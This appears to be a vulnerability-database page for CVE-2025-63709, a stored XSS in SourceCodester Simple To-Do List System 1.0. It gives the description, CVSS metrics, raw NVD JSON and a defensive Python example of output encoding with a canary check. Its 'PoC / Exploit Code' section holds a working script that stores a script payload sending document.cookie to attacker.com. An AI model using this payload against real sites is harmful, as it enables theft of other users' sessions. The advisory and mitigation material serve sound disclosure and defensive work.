Security Vulnerability Report
CVE-2025-63709 CVSS 5.4 MEDIUM

CVE-2025-63709

Published: 2025-11-10 15:15:38
Last Modified: 2025-12-01 20:15:54

Description

A Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Simple To-Do List System 1.0 in the "Add Tasks" text input. An authenticated user can submit HTML/JavaScript that is not correctly sanitized or encoded on output. The injected script is stored and later rendered in the browser of any user who views the task, allowing execution of arbitrary script in the context of the victim's browser.
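As an added example (not code from the advisory, the NVD record or the SourceCodester project), the Python below models the flaw the description refers to and a safe way to confirm it: a task string concatenated raw into the list HTML beside the same string HTML-encoded on output (the PHP analogue of the fix is htmlspecialchars($task, ENT_QUOTES, 'UTF-8')), plus a classifier that tells from a fetched task-list page whether a harmless canary came back as live markup, as entities, or not at all. The task-list URL, the canary string and the list-item markup are assumptions; the real application's paths and templates are not given on this page.

```python
import html

# Added example, not part of the advisory or the SourceCodester code base.
# 1. A minimal model of the "Add Tasks" -> task list flow, rendered the
#    vulnerable way (raw concatenation) and the hardened way (encode on output).
# 2. A classifier that decides, from a fetched task-list page, whether a stored
#    probe came back raw (stored XSS confirmed), encoded (mitigated) or absent.
# A benign canary is used instead of a cookie-stealing payload: the raw tag in
# the response is sufficient proof of CWE-79 and harms no other user.

CANARY_ID = "xss-canary-7f3a"          # assumed marker, chosen to be unique
PROBE = f'<img src=x id="{CANARY_ID}">'  # constructed probe, no event handler

# Assumed list-item markup; the real template is not shown on this page.
def render_task_unsafe(task):
    """The vulnerable pattern: user-controlled text dropped straight into HTML."""
    return f'<li class="task">{task}</li>'

def render_task_safe(task):
    """Hardened rendering: HTML-encode on output.

    html.escape(..., quote=True) turns &, <, >, " and ' into entities, the same
    idea as PHP's htmlspecialchars($task, ENT_QUOTES, 'UTF-8'), so the browser
    treats the task as text rather than markup.
    """
    return f'<li class="task">{html.escape(task, quote=True)}</li>'

def classify_rendering(page_html, probe=PROBE):
    """Classify how a previously stored probe string appears in a page.

    Returns 'raw' when the probe is present as live markup (stored XSS),
    'encoded' when only an entity-escaped form is present, 'absent' otherwise.
    """
    if probe in page_html:
        return "raw"
    escaped_forms = (html.escape(probe, quote=True), html.escape(probe, quote=False))
    if any(form in page_html for form in escaped_forms):
        return "encoded"
    return "absent"

def check_target(session, list_url, probe=PROBE):
    """Fetch the task list through an authenticated session and classify it.

    Hypothetical helper: `session` is any object with a .get(url, timeout=...)
    method returning an object with a .text attribute (requests.Session fits),
    and `list_url` is an assumption; the advisory does not give the real path.
    Use only against systems you are authorized to test.
    """
    resp = session.get(list_url, timeout=10)
    return classify_rendering(resp.text, probe)

if __name__ == "__main__":
    # Constructed sample pages standing in for real HTTP responses.
    vulnerable_page = "<ul>" + render_task_unsafe(PROBE) + "</ul>"
    hardened_page = "<ul>" + render_task_safe(PROBE) + "</ul>"
    print("unsafe render :", classify_rendering(vulnerable_page))  # raw
    print("safe render   :", classify_rendering(hardened_page))    # encoded
```

Against a live instance, store the probe through the "Add Tasks" form with an authenticated session, then pass that session and the task-list URL to check_target; a result of 'raw' confirms the issue without planting a payload that would execute in other users' browsers, and 'encoded' is what a fixed build should return.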

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:chuck24:simple_to-do_list_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Simple To-Do List System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2025-63709 PoC - Stored XSS in SourceCodester Simple To-Do List System
# Target: SourceCodester Simple To-Do List System 1.0

TARGET_URL = "http://target-website.com"        # Replace with actual target URL
LOGIN_URL = f"{TARGET_URL}/login.php"           # Adjust path as needed
ADD_TASK_URL = f"{TARGET_URL}/add_task.php"     # Adjust path as needed

# Malicious XSS payload (stored, fires in the browser of anyone viewing the task list)
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
# Alternative payload: '<img src=x onerror=alert(document.cookie)>'


def exploit():
    """
    Exploit the stored XSS vulnerability in the "Add Tasks" input field.
    Returns True when both requests were accepted, False otherwise.
    """
    session = requests.Session()

    # Step 1: Log in with a low-privilege account (field names assumed; adjust to the login form)
    login_data = {
        'username': 'attacker',   # Low-privilege user
        'password': 'password123'
    }

    try:
        response = session.post(LOGIN_URL, data=login_data, timeout=10)
        response.raise_for_status()

        # Step 2: Add a task containing the XSS payload (field names assumed; adjust to the form)
        task_data = {
            'task': XSS_PAYLOAD,   # Inject XSS payload
            'submit': 'Add Task'
        }
        response = session.post(ADD_TASK_URL, data=task_data, timeout=10)
        response.raise_for_status()

        # Step 3: When a victim views the task list, the stored script executes
        print("[+] XSS payload submitted successfully")
        print(f"[+] Payload: {XSS_PAYLOAD}")
        print("[+] Any user viewing the task list will have their cookies stolen")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    return True


if __name__ == "__main__":
    print("CVE-2025-63709 - Stored XSS in Simple To-Do List System")
    sys.exit(0 if exploit() else 1)

References

https://github.com/floccocam-cpu/CVE-Research-2025/tree/main/CVE-2025-63709 (Exploit, Mitigation, Third Party Advisory)
https://www.sourcecodester.com/php/17897/simple-do-list-system-using-php.html (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63709", "sourceIdentifier": "[email protected]", "published": "2025-11-10T15:15:37.793", "lastModified": "2025-12-01T20:15:54.240", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Simple To-Do List System 1.0 in the \"Add Tasks\" text input. An authenticated user can submit HTML/JavaScript that is not correctly sanitized or encoded on output. The injected script is stored and later rendered in the browser of any user who views the task, allowing execution of arbitrary script in the context of the victim's browser."}, {"lang": "es", "value": "Una vulnerabilidad de Cross-Site Scripting (XSS) existe en SourceCodester Simple To-Do List System 1.0 en el campo de texto 'Add Tasks'. Un usuario autenticado puede enviar HTML/JavaScript que no se depura o codifica correctamente en la salida. El script inyectado se almacena y luego se renderiza en el navegador de cualquier usuario que vea la tarea, permitiendo la ejecución de script arbitrario en el contexto del navegador de la víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chuck24:simple_to-do_list_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "188CC7C5-CF9B-4488-B4DE-1B3547AFFDF2"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/tree/main/CVE-2025-63709", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/17897/simple-do-list-system-using-php.html", "source": "[email protected]", "tags": ["Product"]}]}}